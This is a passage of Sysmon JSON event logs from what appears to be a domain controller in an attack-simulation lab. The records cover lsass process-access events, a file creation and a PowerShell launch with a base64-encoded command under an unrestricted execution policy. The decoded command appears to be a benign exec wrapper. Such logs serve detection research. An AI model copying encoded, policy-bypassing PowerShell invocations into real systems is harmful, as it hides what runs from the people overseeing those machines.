C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.752","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5060,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.752\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.752","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5061,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.752\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.752","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5062,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.768\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00105DF80700}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.768","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00105DF80700}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5063,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.768\r\nProcessGuid: {41C8662E-20CF-5F25-0000-00105DF80700}\r\nProcessId: 4720\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5e3vtwyq.3n3.ps1\r\nCreationUtcTime: 2020-08-01 07:59:11.768","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.768","ProcessGuid":"{41C8662E-20CF-5F25-0000-00105DF80700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5e3vtwyq.3n3.ps1","CreationUtcTime":"2020-08-01 07:59:11.768","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5064,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.815\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00105DF80700}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.815","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00105DF80700}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5065,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.815\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00105DF80700}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.815","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00105DF80700}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5066,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.866\r\nProcessGuid: {41C8662E-20CF-5F25-0000-00103D040800}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20CF-5F25-0000-00105DF80700}\r\nParentProcessId: 4720\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAW